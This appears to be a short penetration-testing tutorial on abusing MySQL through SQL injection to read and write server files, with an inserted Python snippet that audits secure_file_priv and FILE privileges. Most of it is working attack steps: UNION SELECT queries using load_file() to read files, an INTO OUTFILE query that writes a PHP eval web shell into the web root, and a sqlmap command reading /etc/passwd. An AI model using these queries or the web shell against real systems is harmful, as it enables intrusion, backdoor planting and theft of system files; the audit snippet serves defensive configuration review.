Conditions for reading and writing:
1. The value of secure_file_priv must not be NULL
2. The absolute path of the file to read or write is known
3. Preferably a high-privilege account (root)
View the value of secure_file_priv
mysql> show global variables like '%secure%';
+------------------+------------------------------+
| Variable_name    | Value                        |
+------------------+------------------------------+
| secure_auth      | OFF                          |
| secure_file_priv | C:\phpStudy\PHPTutorial\WWW\ |
+------------------+------------------------------+
2 rows in set (0.00 sec)
To set it, open my.ini and add the following line:
secure_file_priv = 'C:\phpStudy\PHPTutorial\WWW '
View permissions
mysql> select * from admin where id = 1 union select 1,user(),3;
+------+----------------+----------+
| id   | username       | password |
+------+----------------+----------+
|    1 | admin          | 123      |
|    1 | root@localhost | 3        |
+------+----------------+----------+
2 rows in set (0.00 sec)
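
As an added example (not part of the original notes), the conditions above can be turned into a configuration audit: the function flags a secure_file_priv that is empty or overlaps the web root, and lists accounts holding the FILE privilege. The function names, severity labels and the web_root parameter are assumptions made for this illustration.

```python
import ntpath

# Inputs are collected by the auditor, for example with:
#   SHOW GLOBAL VARIABLES LIKE 'secure_file_priv';
#   SELECT user, host FROM mysql.user WHERE File_priv = 'Y';

def _norm(path):
    # ntpath accepts both C:\dir\ and C:/dir spellings; compare case-insensitively
    return ntpath.normcase(ntpath.normpath(path))

def _inside(child, parent):
    # True when child is parent itself or a directory below it
    child, parent = _norm(child), _norm(parent)
    return child == parent or child.startswith(parent.rstrip("\\") + "\\")

def audit_file_access(secure_file_priv, web_root, file_priv_accounts):
    """Return (severity, message) findings for MySQL file read/write exposure.

    secure_file_priv   -- None for NULL, "" for empty, else a directory
    web_root           -- directory the web server serves (assumed known)
    file_priv_accounts -- accounts holding the FILE privilege
    """
    if secure_file_priv is None:
        return []  # NULL disables LOAD_FILE() and INTO OUTFILE entirely
    findings = []
    if secure_file_priv == "":
        findings.append(("high", "secure_file_priv is empty: no path restriction"))
    elif _inside(secure_file_priv, web_root) or _inside(web_root, secure_file_priv):
        findings.append(("high", "secure_file_priv overlaps the web root"))
    else:
        findings.append(("info", "file operations limited to " + secure_file_priv))
    for account in file_priv_accounts:
        findings.append(("medium", "FILE privilege held by " + account))
    return findings

if __name__ == "__main__":
    # Constructed input mirroring the values shown on this page
    for sev, msg in audit_file_access("C:\\phpStudy\\PHPTutorial\\WWW\\",
                                      "C:/phpStudy/PHPTutorial/WWW",
                                      ["root@localhost"]):
        print(sev, msg)
```
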
Read file content
mysql> select * from admin where id = 1 union select 1,load_file("C:\\phpStudy\\PHPTutorial\\WWW\\1.txt"),3;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | admin    | 123      |
|    1 | 11111    | 3        |
+------+----------+----------+
2 rows in set (0.00 sec)
Write file
mysql> select * from admin where id = 1 union select 1,"<?php @eval($_GET['x']; ?)>",3 into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\1.php';
Query OK, 2 rows affected (0.00 sec)
The execution is successful, and the 1.php we wrote is generated in this directory. Verify whether it can be executed.
Reading files with sqlmap
The --file-read option is used to read a file from the target server:
sqlmap.py -u "http://xxx/x?id=1" --file-read=/etc/passwd